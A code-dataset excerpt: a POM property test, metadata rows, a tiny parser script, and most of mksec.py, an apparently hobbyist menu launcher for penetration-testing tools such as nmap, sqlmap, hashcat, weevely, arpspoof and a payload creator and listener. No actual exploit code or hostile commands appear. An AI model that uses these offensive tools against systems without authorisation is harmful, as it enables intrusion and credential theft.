def test_get_project_parent_builtin_properties(pom):
assert pom.get_property('project.parent.groupId') == 'com.example'
assert pom.get_property('pom.parent.groupId') == 'com.example'
assert pom.get_property('project.parent.artifactId') == 'foobar-parent'
assert pom.get_property('pom.parent.artifactId') == 'foobar-parent'
assert pom.get_property('project.parent.version') == '4.5.6'
assert pom.get_property('pom.parent.version') == '4.5.6'
def test_existing_property(pom):
assert pom.get_property('foo.bar') == 'FooBar'
assert pom.get_property('hello') == 'hello-world'
def test_existing_parent_property(pom):
assert pom.get_property('hiThere') == 'hi_there'
assert pom.get_property('omg') == 'oh-my-god'
def test_nonexistent_property(pom):
assert pom.get_property('wtf') is None
assert pom.get_property('project.wtf') is None
assert pom.get_property('pom.wtf') is None
assert pom.get_property('project.parent.wtf') is None
assert pom.get_property('pom.parent.wtf') is None
| 36.504013
| 110
| 0.582798
| 2,760
| 22,742
| 4.71087
| 0.069565
| 0.051223
| 0.016844
| 0.099677
| 0.841486
| 0.811183
| 0.753576
| 0.734887
| 0.674358
| 0.656822
| 0
| 0.031638
| 0.256442
| 22,742
| 622
| 111
| 36.562701
| 0.737138
| 0
| 0
| 0.701128
| 0
| 0.048872
| 0.694398
| 0.131299
| 0
| 0
| 0
| 0
| 0.12218
| 1
| 0.06015
| false
| 0
| 0.015038
| 0.005639
| 0.080827
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba49b86e555ba36960129983c6c19aa4b860eb19
| 70
|
py
|
Python
|
parser_utils.py
|
grwgreg/silviux
|
69ab953be83e920e8bf397a3549ab3d955f653c1
|
[
"BSD-2-Clause"
] | 54
|
2021-03-23T02:10:15.000Z
|
2022-03-06T03:29:29.000Z
|
parser_utils.py
|
grwgreg/silviux
|
69ab953be83e920e8bf397a3549ab3d955f653c1
|
[
"BSD-2-Clause"
] | null | null | null |
parser_utils.py
|
grwgreg/silviux
|
69ab953be83e920e8bf397a3549ab3d955f653c1
|
[
"BSD-2-Clause"
] | 3
|
2021-07-28T20:48:15.000Z
|
2021-09-17T23:35:58.000Z
|
import silviux.parser.parser_utils
silviux.parser.parser_utils.run()
| 17.5
| 34
| 0.842857
| 10
| 70
| 5.7
| 0.5
| 0.45614
| 0.666667
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057143
| 70
| 3
| 35
| 23.333333
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ba81f5e235a85a4037aaef00acf7e30d10210ebc
| 384,817
|
py
|
Python
|
mksec.py
|
generatorexit/mksec
|
f4b4dc31b4248658b4cad0fe25c7d7a836a375d4
|
[
"MIT"
] | null | null | null |
mksec.py
|
generatorexit/mksec
|
f4b4dc31b4248658b4cad0fe25c7d7a836a375d4
|
[
"MIT"
] | null | null | null |
mksec.py
|
generatorexit/mksec
|
f4b4dc31b4248658b4cad0fe25c7d7a836a375d4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import random
import readline
autocompleter = ["no banner","banner","menu","exit","quit","help","?","about","clear","back","information gathering","vulnerability analysis","web application analysis","password attacks","wireless attacks","exploitation tools","sniffing & spoofing","post exploitation","forensics","reporting tools","linux commands","mksec tools","show all tools","dmitry","ike-scan","netdiscover","nbtscan","nmap","theharvester","information gathering more","nikto","unix-privesc-check","chkrootkit","lynis","nessus","skipfish","wpscan","sqlmap","cewl","crunch","hashcat","john","medusa","ncrack","hash-identifier","hashid","wordlists","searchsploit","veil","macchanger","exe2hex","weevely","binwalk","bulk_extractor","foremost","hashdeep","cutycapt","pipal","find","grep","man","payload creator and listener"]
def completer(text,state):
options = [x for x in autocompleter if x.startswith(text.lower())]
try:
return options[state]
except IndexError:
return None
readline.set_completer(completer)
readline.parse_and_bind("tab: complete")
os.system("clear")
# responder yapcam en son msfconsole eklemek olabilir. post exploit kategorisinden veili kaldir
# mitmproxy, netsniff-ng, dirbuster, golismero eklenebilir. eklenmezse kategoriden sil.
try:
banner1 = ("\x1b[1m\x1b[31m\n\n\n\n\n0111100101101111011101010010000001110010\n0110010101100001011011000110110001111001\n0010000001101000011000010111011001100101\n0010000001110100011011110010000001101101\n0111010101100011011010000010000001110100\n0110100101101101011001010010000001101111\n0110111000100000011110010110111101110101\n0111001000100000011010000110000101101110\n0110010001110011001000000010100000111010\n0010000001110100011010000110000101101110\n0110101101110011001000000110011001101111\n0111001000100000011101010111001101101001\n0110111001100111001000000111010001101000\n0110010100100000011011010110101101110011\n0110010101100011001011100010000000101010\n0110100001110101011001110111001100101010\n\n\n\n\n")
banner2 = ("\x1b[1m\x1b[36m\n\n\n\n\n\n\n\n\n\n.##.....##.##....##..######..########..######.\n.###...###.##...##..##....##.##.......##....##\n.####.####.##..##...##.......##.......##......\n.##.###.##.#####.....######..######...##......\n.##.....##.##..##.........##.##.......##......\n.##.....##.##...##..##....##.##.......##....##\n.##.....##.##....##..######..########..######.\n\n\n\n\n\n\n\n\n")
banner3 =("\x1b[1m\x1b[36m\n\n\n\n\n\n\n\n\n\n##::::'##:'##:::'##::'######::'########::'######::\n###::'###: ##::'##::'##... ##: ##.....::'##... ##:\n####'####: ##:'##::: ##:::..:: ##::::::: ##:::..::\n## ### ##: #####::::. ######:: ######::: ##:::::::\n##. #: ##: ##. ##::::..... ##: ##...:::: ##:::::::\n##:.:: ##: ##:. ##::'##::: ##: ##::::::: ##::: ##:\n##:::: ##: ##::. ##:. ######:: ########:. ######::\n..:::::..::..::::..:::......:::........:::......::\n\n\n\n\n\n\n\n")
banner4 =("\x1b[1m\x1b[33m\n\n\n\n\n\n\n A\n /_\\\n : /_|_\\\n ::: /|__|_\\\n ::.:: /|_|__|_\ :\n ::.:.::/__|_|__|_\ :.:\n :..:.:./_|__|__|__|\ :.:.:\n :.:..:./|__|___|__|__\:.:..::\n ......::..:../__|___|__|___|_\..:..::........\n ..:..:..:/_|__|___|___|___|\:..:..::::::::::::\n ::::.:..:./___|___|___|___|___\..........\n.........../..!...!...!...!...!..\...........\n\t\t \x1b[36m \x1b[5m-mksec- \x1b[0m \x1b[1m\n\n\n\n\n\n")
banner5 =("\x1b[1m\x1b[33m\n\n\n\n\n\n \x1b[33m/\\\n \x1b[33m/ \ \x1b[36m___\x1b[36m\n \x1b[36m\ __ \x1b[33m/ \ \x1b[36m__ /\n \x1b[36m\ / \ _ \x1b[33m/ <()> \ \x1b[36m_ / \ /\n \x1b[36m\_/ \_/ \_\x1b[33m/________\\\x1b[36m_/ \_/ \_/\n\x1b[37m_______________\x1b[33m/__I___I___\\\x1b[37m________________\n \x1b[33m/_I___I___I__\\\n /I___I___I___I_\\\n /___I___I___I___I\\\n /__I___I___I___I___\\\n /_I___I___I___I___I__\\\n /I___I___I___I___I___I_\\\n /___I___I___I___I___I___I\\\n /__I___I___I___I___I___I___\\\n /_I___I___I___I___I___I___I__\\\x1b[37m\n\x1b[36m\t\t \x1b[5m-mksec- \x1b[0m \x1b[1m\n\n\n\n")
banner6 =("\x1b[1m\x1b[31m\n\n\nILOVEYOUILOVEYOUILOVEYOUILOVEYOUILOVEYOUILO\nILOVEYOUILO \x1b[37m****** \x1b[31mVEYOU \x1b[37m****** \x1b[31mILOVEYOUILO\nILOVEYOU \x1b[37m*********** \x1b[31mI \x1b[37m*********** \x1b[31mLOVEYOUI\nOUIUI \x1b[37m*************** *************** \x1b[31mVEYOU\nYOUI \x1b[37m********************************** \x1b[31mLOV\nIL \x1b[37m************************************* \x1b[31mOV\nL \x1b[37m*****************\x1b[36m\x1b[5mmksec\x1b[0m\x1b[1m***************** \x1b[31mO\nI \x1b[37m*************************************** \x1b[31mL\nU \x1b[37m*************************************** \x1b[31mI\nOU \x1b[37m************************************* \x1b[31mIL\nUIL \x1b[37m*********************************** \x1b[31mOVE\nOVEYO \x1b[37m******************************* \x1b[31mULOVE\nOVEYOUI \x1b[37m**************************** \x1b[31mLOVEYO\nEYOUILOVE \x1b[37m*********************** \x1b[31mYOUILOVEY\nVEYOUILOVEYOU \x1b[37m***************** \x1b[31mILOVEYOUILO\nILOVEYOUILOVEYO \x1b[37m************* \x1b[31mLOVEYOUILOVEY\nUILOVEYOUILOVEYOU \x1b[37m********* \x1b[31mLOVEYOUILOVEYOU\nLOVEYOUILOVEYOUILOV \x1b[37m***** \x1b[31mILOVEYOUILOVEYOUI\nEYOUILOVEYOUILOVEYOU \x1b[37m*** \x1b[31mYOULOVEYOUILOVEYOU\nVEYOUILOVEYOUILOVEYOU \x1b[37m* \x1b[31mVEYOUILOVEYOUILOVEY\nOVEYOUILOVEYOUILOVEYOUILOVEYOUILOVEYOUILOVE\n\n")
banner7 =('\x1b[1m\x1b[37m\n\n\n\n\n\n\n888888888888888888888888888888888888888888888888888888888888\n888888888888888888888888888888888888888888888888888888888888\n8888888888888888888888888P"" ""9888888888888888888888888888\n8888888888888888P"88888P 988888"9888888888888888888\n8888888888888888 "9888 888P" 888888888888888888\n888888888888888888bo "9 d8o o8b P" od88888888888888888888\n888888888888888888888bob 98" "8P dod88888888888888888888888\n888888888888888888888888 db 88888888888888888888888888\n88888888888888888888888888 8888888888888888888888888888\n88888888888888888888888P"9bo odP"98888888888888888888888888\n88888888888888888888P" od88888888bo "98888888888888888888888\n888888888888888888 d88888888888888b 88888888888888888888\n8888888888888888888oo8888888888888888oo888888888888888888888\n888888888888888888888888888888888888888888888888888888888888\n\n\n\n\n')
banner8 =("""\x1b[1m\x1b[33m\n\n\n\n\n /^\\\n \x1b[35mL L \x1b[33m/ \ \x1b[35mL L\n __/|/|_ \x1b[33m/ . \ \x1b[35m_|\|\__\n /_| [_[_\ \x1b[33m/ .-\ \x1b[35m/_]_] |_\\\n /__\ __`-\_____ \x1b[33m/ . \ \x1b[35m_____/-`__ /__\\\n /___] /=@> _ {> \x1b[33m/-. \ \x1b[35m<} _ <@=\ [___\\\n /____/ /` `--/ \x1b[33m/ . \ \x1b[35m\--` `\ \____\\\n /____/ \____/`-._> \x1b[33m/ \ \x1b[35m<_.-`\____/ \____\\\n /____/ /__/ \x1b[33m/-._ . _.- \ \x1b[35m\__\ \____\\\n /____/ /__/ \x1b[33m/ . \ \x1b[35m\__\ \____\\\n|____/_ _/__/ \x1b[33m/ . \ \x1b[35m\__\_ _\____|\n \__/_ ``_|_/ \x1b[33m/ -._ . _.-\ \x1b[35m\_|_`` _\___/\n /__`-`__\ \x1b[33m<_ `-; _> \x1b[35m/__`-`__\\\n `-` \x1b[33m`-._ ; _.-` \x1b[35m`-`\n \x1b[33m`-._ ; _.-`\n \x1b[33m`-._.-`\n\n\n\n\n""")
banner9 =("""\x1b[1m\x1b[33m\n\n \x1b[37m ___\n \x1b[37m,o88888\n \x1b[37m,o8888888'\n \x1b[33m,:o:o:oooo. \x1b[37m,8O88Pd8888"\n \x1b[33m,.::.::o:ooooOoOoO. \x1b[37m,oO8O8Pd888'"\n \x1b[33m,.:.::o:ooOoOoOO8O8OOo.\x1b[37m8OOPd8O8O"\n \x1b[33m, ..:.::o:ooOoOOOO8OOOOo.\x1b[37mFdO8O8"\n \x1b[33m, ..:.::o:ooOoOO8O888O8O\x1b[37m,COmCOO"\n \x1b[33m, . ..:.::o:ooOoOOOO8OOO\x1b[37mOCOCO"\n \x1b[33m. ..:.::o:ooOoOoOO8O\x1b[37m8OCCCC"\x1b[33mo\n \x1b[33m. ..:.::o:ooooO\x1b[37moCoCCC"\x1b[33mo:o\n \x1b[33m. ..:.::o:o:\x1b[37m,cooooCo"\x1b[33moo:o:\n \x1b[33m` . . ..:.\x1b[37m:cocoooo"'\x1b[33mo:o:::'\n \x1b[37m.\x1b[33m` . ..\x1b[37m::ccccoc"'\x1b[33mo:o:o:::'\n \x1b[37m:.:.\x1b[33m \x1b[37m,c:cccc"'\x1b[33m:.:.:.:.:.'\n \x1b[37m..:.:"'\x1b[33m`\x1b[37m::::c:"'\x1b[33m..:.:.:.:.:.'\n \x1b[37m...:.'.:.::::"'\x1b[33m . . . . .'\n \x1b[37m.. . ....:."' \x1b[33m` . . . ''\n \x1b[37m. . . ...."'\n \x1b[37m.. . ."'\n\x1b[37m.\n\n\n""")
banner10 =("\x1b[1m\x1b[31m\n\n ..:::::::::..\n ..:::\x1b[37maad8888888baa\x1b[31m:::..\n .::::\x1b[37md:?88888888888?::8b\x1b[31m::::.\n .:::\x1b[37md8888:?88888888??a888888b\x1b[31m:::.\n .:::\x1b[37md8888888a8888888aa8888888888b\x1b[31m:::.\n ::::\x1b[37mdP::::::::88888888888::::::::Yb\x1b[31m::::\n ::::\x1b[37mdP:::::::::Y888888888P:::::::::Yb\x1b[31m::::\n ::::\x1b[37md8:::::::::::Y8888888P:::::::::::8b\x1b[31m::::\n.::::\x1b[37m88::::::::::::Y88888P::::::::::::88\x1b[31m::::.\n:::::\x1b[37mY8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P\x1b[31m:::::\n:::::::\x1b[37mY88888888888P::|::Y88888888888P\x1b[31m:::::::\n::::::::::::::::\x1b[37m888:::|:::888\x1b[31m::::::::::::::::\n`:::::::::::::::\x1b[37m8888888888888b\x1b[31m::::::::::::::'\n :::::::::::::::\x1b[37m88888888888888\x1b[31m::::::::::::::\n :::::::::::::\x1b[37md88888888888888\x1b[31m:::::::::::::\n ::::::::::::\x1b[37m88::88::88:::88\x1b[31m::::::::::::\n `::::::::::\x1b[37m88::88::88:::88\x1b[31m::::::::::'\n `::::::::\x1b[37m88::88::P::::88\x1b[31m::::::::'\n `::::::\x1b[37m88::88:::::::88\x1b[31m::::::'\n ``:::::::::::::::::::''\n ``:::::::::''\n\n\n")
banner11 =("""\x1b[1m\x1b[31m\n , ,\n ,-`{-`/\n ,-~ , \ {-~~-,\n ,~ , ,`,-~~-,`,\n ,` , { { } } \x1b[32m}/\x1b[31m\n ; ,--/`\ \ / / \x1b[32m}/ /,/\x1b[31m\n; ,-./ \ \ { { ( \x1b[32m/,; ,/ ,/\x1b[31m\n; / ` } } `, `-`-.___ \x1b[32m/ `, ,/ `,/\x1b[31m\n \| ,`,` `~.___,---} \x1b[32m/ ,`,,/ ,`,;\x1b[31m\n ` { { \x1b[32m__ / ,`/ ,`,;\x1b[31m\n / \ \ \x1b[32m_,`, `{ `,{ `,`;`\x1b[31m\n { } } \x1b[37m/~\ \x1b[33m.-:::-. \x1b[32m(--, ;\ `,} `,`;\x1b[31m\n \\._./ / \x1b[37m/` , \ \x1b[33m,:::::::::, \x1b[32m`~; \},/ `,`; ,-=-\x1b[31m\n `-..-` \x1b[37m/. ` .\_ \x1b[33m;:::::::::::; \x1b[32m__,{ `/ `,`; {\x1b[31m\n \x1b[37m/ , ~ . ^ `~`\\\x1b[33m:::::::::::\x1b[32m<<~>-,,`, `-, ``,_ }\x1b[31m\n \x1b[37m/~~ . ` . ~ , .`~~\\\x1b[33m:::::::; \x1b[32m_-~ ;__, `,-`\x1b[31m\n \x1b[37m/`\ /~, . ~ , ' ` , .` \\\x1b[33m::::;` \x1b[32m<<<~``` ``-,,__ ;\x1b[31m\n \x1b[37m/` .`\ /` . ^ , ~ , . ` . ~\~ \x1b[32m\\\\, `,__\x1b[31m\n \x1b[37m/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, \x1b[32m`-`--, \\\x1b[31m\n \x1b[37m/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ \x1b[32m``\x1b[31m\n \x1b[37m/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___\n \x1b[37m/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,\n\n\n""")
bannerList = [banner1, banner2, banner3, banner4, banner5, banner6, banner7, banner8, banner9, banner10, banner11]
words = ['\x1b[0m \x1b[3m\n"Failure is not the opposite of success; its part of success."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Every accomplishment starts with the decision to try."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"I have nothing to lose,but something to gain."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Just because i walk alone doesnt mean im lost."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Dont try to be different. Just be good. To be good is different enough."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Time never comes again."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"A smooth sea never made a skilled sailor."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Its always too early to quit."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Silence is the most powerful scream."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Everything has beauty, but not everyone sees it."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"The best way to predict your future is to create it."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Every accomplishment starts with the decision to try."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Its hard to beat a person who never gives up."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"They can kill the dreamer, but they can never kill the dream."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"I have nothing to lose,but something to gain."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"A person starts dying when they stop dreaming."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Great minds discuss ideas, average minds discuss events, small minds discuss people."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Life is like a coin: You can spend it any way you wish, but you only spend it once."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"You can cut all the flowers, but you cannot keep spring from coming."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"An intelligent hell would be better than a stupid paradise."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Being good is easy, what is difficult is being just."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Some people die at 25 and arent buried until 75."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"Always tell the truth. That way, you dont have to remember what you said."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"The problem with the world is that the intelligent people are full of doubts, while the stupid ones are full of confidence."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"In order to succeed, you must first believe that you can."\x1b[0m\x1b[1m','\x1b[0m \x1b[3m\n"If you can dream it, you can do it."\x1b[0m\x1b[1m']
hint = ['\x1b[0m \x1b[3m\nType "help" to see all commands.\x1b[0m\x1b[1m ',"\x1b[0m \x1b[3m\nTo open a tool, you can type its name.\x1b[0m\x1b[1m","\x1b[0m \x1b[3m\nYou can open a tool by not only writing its number, but also its name. ex: ig == information gathering\x1b[0m\x1b[1m"]
def Tools(uinput):
if uinput == "dmitry":
dmitry()
elif uinput == "ike-scan":
ikeScan()
elif uinput == "netdiscover":
netdiscover()
elif uinput == "nbtscan":
nbtscan()
elif uinput == "nmap":
nmap()
elif uinput == "theharvester":
theHarvester()
elif uinput == "more":
informationGatheringMore()
elif uinput == "nikto":
nikto()
elif uinput == "unix-privesc-check":
unixPrivescCheck()
elif uinput == "chkrootkit":
chkrootkit()
elif uinput == "lynis":
lynis()
elif uinput == "nessus":
nessus()
elif uinput == "skipfish":
skipfish()
elif uinput == "wpscan":
wpscan()
elif uinput == "sqlmap":
sqlmap()
elif uinput == "cewl":
cewl()
elif uinput == "crunch":
crunch()
elif uinput == "hashcat":
hashcat()
elif uinput == "john":
john()
elif uinput == "medusa":
medusa()
elif uinput == "ncrack":
ncrack()
elif uinput == "hash-identifier" or uinput == "hashid":
hashIdentifier()
elif uinput == "wordlists" or uinput == "wordlist":
wordlists()
elif uinput == "payload creator and listener":
PayloadCreatorAndListener()
elif uinput == "searchsploit":
searchsploit()
elif uinput == "veil":
veil()
elif uinput == "macchanger":
macchanger()
elif uinput == "mitmproxy":
macchanger()
elif uinput == "netsniff-ng":
macchanger()
elif uinput == "responder":
responder()
elif uinput == "arpspoof":
arpspoof()
elif uinput == "exe2hex":
exe2hex()
elif uinput == "weevely":
weevely()
elif uinput == "binwalk":
binwalk()
elif uinput == "bulk_extractor":
bulkExtractor()
elif uinput == "foremost":
foremost()
elif uinput == "hashdeep":
hashdeep()
elif uinput == "cutycapt":
cutycapt()
elif uinput == "pipal":
pipal()
elif uinput == "find":
os.system("clear")
find()
elif uinput == "grep":
os.system("clear")
grep()
elif uinput == "man":
os.system("clear")
man()
elif uinput == "cli":
os.system("clear")
cli()
elif uinput == "alc" or uinput == "alllinuxcommands" or uinput == "all linux commands":
os.system("clear")
alc()
def RandomBannerSelector():
print(random.choice(bannerList))
print(random.choice(words))
print(random.choice(hint))
def MainMenu():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tMain Menu\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Information Gathering\n\x1b[37m02\x1b[36m Vulnerability Analysis\n\x1b[37m03\x1b[36m Web Application Analysis\n\x1b[37m04\x1b[36m Password Attacks\n\x1b[37m05\x1b[36m Wireless Attacks\n\x1b[37m06\x1b[36m Exploitation Tools\n\x1b[37m07\x1b[36m Sniffing & Spoofing\n\x1b[37m08\x1b[36m Post Exploitation\n\x1b[37m09\x1b[36m Forensics\n\x1b[37m10\x1b[36m Reporting Tools\n\x1b[37m11\x1b[36m Linux Commands\n\x1b[37m12\x1b[36m Mksec Tools\n\x1b[37m13\x1b[36m Show All Tools\n")
NoBanner()
def NoBanner():
uinput = input("\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.lower().strip()
Tools(uinput)
if uinput == "":
NoBanner()
elif "no banner" == uinput:
os.system("clear")
NoBanner()
elif uinput == "banner" or "menu" == uinput:
os.system("clear")
MainMenu()
elif uinput == "exit":
quit()
elif uinput == "quit":
quit()
elif uinput == "help" or uinput == "?":
os.system("clear")
help()
elif uinput == "about":
os.system("clear")
about()
elif uinput == "clear":
os.system("clear")
NoBanner()
elif "back" == uinput:
print("\x1b[1mUse the 'exit' command to quit.")
NoBanner()
elif uinput == "1" or uinput == "01" or uinput == "information gathering":
os.system("clear")
informationGathering()
elif uinput == "2" or uinput == "02" or uinput == "vulnerability analysis":
os.system("clear")
vulnerabilityAnalysisTools()
elif uinput == "3" or uinput == "03" or uinput == "web application analysis":
os.system("clear")
webApplicationAnalysis()
elif uinput == "4" or uinput == "04" or uinput == "password attacks":
os.system("clear")
passwordAttacks()
elif uinput == "5" or uinput == "05" or uinput == "wireless attacks":
os.system("clear")
wirelessAttacks()
elif uinput == "6" or uinput == "06" or uinput == "exploitation tools":
os.system("clear")
exploitationTools()
elif uinput == "7" or uinput == "07" or uinput == "sniffing & spoofing":
os.system("clear")
sniffingSpoofing()
elif uinput == "8" or uinput == "08" or uinput == "post exploitation":
os.system("clear")
postExploitation()
elif uinput == "9" or uinput == "09" or uinput == "forensics":
os.system("clear")
forensics()
elif uinput == "10" or uinput == "reporting tools":
os.system("clear")
reportingTools()
elif uinput == "11" or uinput == "linux commands":
os.system("clear")
linuxcommands()
elif uinput == "12" or uinput == "mksec tools" or uinput == "mksec":
os.system("clear")
mksectools()
elif uinput == "13" or uinput == "show all tools":
os.system("clear")
showAllTools()
else:
print("\x1b[1m\x1b[31mcommand not found")
NoBanner()
def UserInputs(uinput):
if "back" in uinput.lower():
if uinput.lower() == "backinformation":
os.system("clear")
informationGathering()
elif uinput.lower() == "backvuln":
os.system("clear")
vulnerabilityAnalysisTools()
elif uinput.lower() == "backwebapp":
os.system("clear")
webApplicationAnalysis()
elif uinput.lower() == "backpass":
os.system("clear")
passwordAttacks()
elif uinput.lower() == "backexp":
os.system("clear")
exploitationTools()
elif uinput.lower() == "backsniff":
os.system("clear")
sniffingSpoofing()
elif uinput.lower() == "backpost":
os.system("clear")
postExploitation()
elif uinput.lower() == "backfore":
os.system("clear")
forensics()
elif uinput.lower() == "backrep":
os.system("clear")
reportingTools()
elif uinput.lower() == "backlin":
os.system("clear")
linuxcommands()
elif uinput.lower() == "backmainmenu":
os.system("clear")
MainMenu()
if "clear" in uinput.lower():
os.system('printf "\033c"')
if "about" in uinput.lower():
about()
if "exit" in uinput.lower() or "quit" in uinput.lower():
quit()
if "help" in uinput.lower() or "?" in uinput.lower():
os.system("clear")
help()
if "about" in uinput.lower():
os.system("clear")
about()
# categories
def mksectools():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tMksec Tools\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Pythoncompiler")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.lower().strip()
if uinput == "1":
os.system("clear")
pythonCompiler()
elif uinput == "pythoncompiler":
os.system("clear")
pythonCompiler()
elif uinput == "":
os.system("clear")
informationGathering()
elif uinput == "exit":
quit()
elif uinput == "quit":
quit()
elif uinput == "help":
os.system("clear")
help()
elif uinput == "-h":
os.system("clear")
help()
elif uinput == "--help":
os.system("clear")
help()
elif uinput == "?":
os.system("clear")
help()
elif uinput == "about":
os.system("clear")
about()
elif uinput == "back":
os.system("clear")
MainMenu()
else:
os.system("clear")
informationGathering()
def showAllTools():
print("\x1b[1m\x1b[36m\n\x1b[7m\tAll Tools\n\x1b[0m\x1b[1m\n\x1b[36m Dmitry\n\x1b[36m Ike-scan\n\x1b[36m Netdiscover\n\x1b[36m Nbtscan\n\x1b[36m Nmap\n\x1b[36m Theharvester\n\x1b[36m More (Information Gathering)\n\x1b[36m Nikto\n\x1b[36m Unix-privesc-check\n\x1b[36m Chrootkit\n\x1b[36m Lynis\\x1b[36m Nessus\n\x1b[36m Skipfish\n\x1b[36m Wpscan\n\x1b[36m Sqlmap\n\x1b[36m Cewl\n\x1b[36m Crunch\n\x1b[36m Hashcat\n\x1b[36m John\n\x1b[36m Medusa\n\x1b[36m Ncrack\n\x1b[36m Hash-identifier\n\x1b[36m Wordlists\n\x1b[36m ***wifi araclari eklenecek***\n\x1b[36m Payload Creator and Listener\n\x1b[36m Searchsploit\n\x1b[36m Veil\n\x1b[36m Macchanger\n\x1b[36m Mitmproxy\n\x1b[36m Netsniff-ng\n\x1b[36m Responder\n\x1b[36m Arpspoof\n\x1b[36m Exe2hex\n\x1b[36m Weevely\n\x1b[36m Binwalk\n\x1b[36m Bulk_Extractor\n\x1b[36m Foremost\n\x1b[36m Hashdeep\n\x1b[36m Cutycapt\n\x1b[36m Pipal\n\x1b[36m Find (Linux Commands)\n\x1b[36m Grep (Linux Commands)\n\x1b[36m Man (Linux Commands)\n\x1b[36m Cli (Linux Commands)\n\x1b[36m All Linux Commands\n")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[all_tools]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
Tools(uinput)
UserInputs(uinput+"mainmenu")
if uinput == "":
os.system("clear")
showAllTools()
elif uinput == "banner" or "menu" == uinput:
os.system("clear")
MainMenu()
def informationGathering():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tInformation Gathering\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Dmitry\n\x1b[37m02\x1b[36m Ike-scan\n\x1b[37m03\x1b[36m Netdiscover\n\x1b[37m04\x1b[36m Nbtscan\n\x1b[37m05\x1b[36m Nmap\n\x1b[37m06\x1b[36m Theharvester\n\x1b[37m07\x1b[36m More")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "dmitry":
dmitry()
elif uinput == "2" or uinput == "02" or uinput == "ike-scan":
ikeScan()
elif uinput == "3" or uinput == "03" or uinput == "netdiscover":
netdiscover()
elif uinput == "4" or uinput == "04" or uinput == "nbtscan":
nbtscan()
elif uinput == "5" or uinput == "05" or uinput == "nmap":
nmap()
elif uinput == "6" or uinput == "06" or uinput == "theharvester":
theHarvester()
elif uinput == "7" or uinput == "07" or uinput == "information gathering more":
informationGatheringMore()
elif uinput == "":
os.system("clear")
informationGathering()
def vulnerabilityAnalysisTools():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tVulnerability Analysis Tools\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Nikto\x1b[37m\n\x1b[37m02\x1b[36m Unix-privesc-check\n\x1b[37m03\x1b[36m Chrootkit\n\x1b[37m04\x1b[36m Lynis\n\x1b[37m05\x1b[36m Nessus")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "nikto":
nikto()
elif uinput == "2" or uinput == "02" or uinput == "unix-privesc-check":
unixPrivescCheck()
elif uinput == "3" or uinput == "03" or uinput == "chkrootkit":
chkrootkit()
elif uinput == "4" or uinput == "04" or uinput == "lynis":
lynis()
elif uinput == "5" or uinput == "05" or uinput == "nessus":
nessus()
elif uinput == "":
os.system("clear")
vulnerabilityAnalysisTools()
def webApplicationAnalysis():
RandomBannerSelector()
